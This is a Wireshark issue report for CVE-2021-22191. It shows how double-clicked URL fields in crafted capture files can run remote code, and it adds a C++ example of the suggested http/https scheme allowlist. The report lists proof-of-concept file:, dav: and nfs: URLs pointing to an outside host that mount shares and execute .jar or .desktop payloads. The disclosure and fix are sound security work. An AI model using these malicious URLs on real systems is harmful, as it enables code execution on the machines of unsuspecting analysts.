CVE-2021-22191: Code execution in Wireshark via non-http(s) schemes in URL fields (#17232) · Issues · Wireshark Foundation / wireshark
Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via packet injection or a crafted capture file.
This issue was reported to [email protected] on 2021-01-19 but has not been acknowledged so far. The Xubuntu NFS variant was discovered after the original report and has been added here.
Description
Some fields in the Wireshark proto_tree are double-clickable and pass URLs with arbitrary schemes to the QDesktopServices::openUrl function. http and https URLs passed to this function are opened by the browser, which is generally safe. For some other schemes like dav and file, however, referenced files will be opened by the system's standard application associated with their file type. By preparing internet-hosted file shares and executable files, arbitrary code execution can be achieved via malicious pcap(ng) files or captured live traffic and some user interaction. Depending on which system and scheme/remote protocols are used, slightly different behaviors can be observed. Attached are two PoC videos:
1 - Windows:
- Packet/dissector: DHCP option 114 (Captive Portal)
- Malicious URL: file:////posisec.com/DavWWWRoot/jartest.jar
- File executed: jartest.jar - pops up a Swing dialog box
- System: Fresh Windows 10 install with Wireshark 3.4.2 and standard JRE installation
- Backend: Anonymous WebDAV share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcap file and double-clicks the file URL. The WebDAV share is mounted in the background, and the .jar file is executed.
2.1 - Xubuntu NFS:
- Packet/dissector: X509 Certificate authority info
- Malicious URL: nfs://posisec.com/export/malicious_cmnd.desktop
- File executed: malicious_cmnd.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous NFS share hosted at nfs://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcapng file and double-clicks the nfs URL. The NFS share is mounted in the background, and the .desktop file is executed.
2.2 - Xubuntu WebDAV:
- Packet/dissector: X509 Certificate authority info
- Malicious URL 1: dav://posisec.com/
- Malicious URL 2: file:///run/user/1000/gvfs/dav:host=posisec.com,ssl=false/cmdx.desktop
- File executed: cmdx.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous WebDAV share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user first double-clicks malicious URL 1, which mounts the anonymous WebDAV share and opens the file explorer. When the user then double-clicks malicious URL 2, the foreign .desktop file is executed without an OS warning, since the now-mounted share is referenced via a local file path.
Note that there are more schemes (sftp, davs, smb, …) and payloads (.exe, .bat, …) that can be used to achieve slightly different behaviors. Also note that some ISPs or access point devices may block outgoing SMB traffic, preventing exploitation via internet-hosted SMB shares.
Risk
An attacker could distribute malicious capture files and entice people to inspect them. On Windows with a JRE installed, a single double-click on a crafted field is enough to cause code execution on the victim's system.
Mitigation suggestion
Add sanitization logic in ProtoTree::itemDoubleClicked to only allow whitelisted URL schemes (http, https).
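As an added example (not Wireshark's own code, and not the fix the project shipped), here is the scheme allowlist the mitigation suggestion describes, covering the double-click path laid out under Description: the URL's scheme is extracted per RFC 3986, lowercased, and compared against an allowlist of http and https before anything is handed to the desktop URL opener. It is written against std::string so it compiles without Qt; the ProtoTree::itemDoubleClicked call site in the trailing comment, the QString/QUrl usage there, and the helper names urlScheme and isAllowedUrlScheme are assumptions.

```cpp
// Added example, not Wireshark's code: allowlist the URL scheme before a
// double-clicked proto_tree field is passed to the desktop's URL opener.
#include <algorithm>
#include <cctype>
#include <string>
#include <vector>

// Extract the scheme of a URL per RFC 3986 section 3.1:
//   scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ), terminated by ':'.
// Returns an empty string when no syntactically valid scheme is present
// (relative reference, missing ':', leading digit, empty input).
std::string urlScheme(const std::string &url) {
    if (url.empty() || !std::isalpha(static_cast<unsigned char>(url[0])))
        return "";
    std::string::size_type i = 0;
    while (i < url.size()) {
        const unsigned char c = static_cast<unsigned char>(url[i]);
        if (std::isalnum(c) || c == '+' || c == '-' || c == '.') {
            ++i;
            continue;
        }
        break;
    }
    if (i >= url.size() || url[i] != ':')
        return "";  // no ':' terminator, so what we scanned is not a scheme
    std::string scheme = url.substr(0, i);
    // Scheme matching is case-insensitive, so normalise to lowercase.
    std::transform(scheme.begin(), scheme.end(), scheme.begin(),
                   [](unsigned char ch) { return static_cast<char>(std::tolower(ch)); });
    return scheme;
}

// The allowlist from the mitigation suggestion: only http and https are
// opened. Everything else (file, dav, davs, nfs, smb, sftp, or no scheme
// at all) is refused; an allowlist avoids chasing every opener-handled scheme.
bool isAllowedUrlScheme(const std::string &url) {
    static const std::vector<std::string> kAllowed = {"http", "https"};
    const std::string scheme = urlScheme(url);
    return !scheme.empty() &&
           std::find(kAllowed.begin(), kAllowed.end(), scheme) != kAllowed.end();
}

// Sketch of the Qt call site (an assumption about the UI code, not the
// project's actual implementation):
//
//   void ProtoTree::itemDoubleClicked(const QModelIndex &index) {
//       ...
//       QString url = ...;  // URL text taken from the double-clicked field
//       if (isAllowedUrlScheme(url.toStdString()))
//           QDesktopServices::openUrl(QUrl(url));
//       // otherwise ignore it: never hand a file:, dav:, nfs: or smb: URL to
//       // the desktop opener from untrusted capture data
//   }
```

Note that file:////host/share/x (four slashes, a UNC-style path) and file:///run/user/1000/gvfs/... both parse as scheme "file" and are rejected just like dav: and nfs:; the check does not need to understand what the path points at. In Qt the same comparison can be done on QUrl(url).scheme(), which already returns the scheme lowercased.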
Edited Feb 12, 2021 by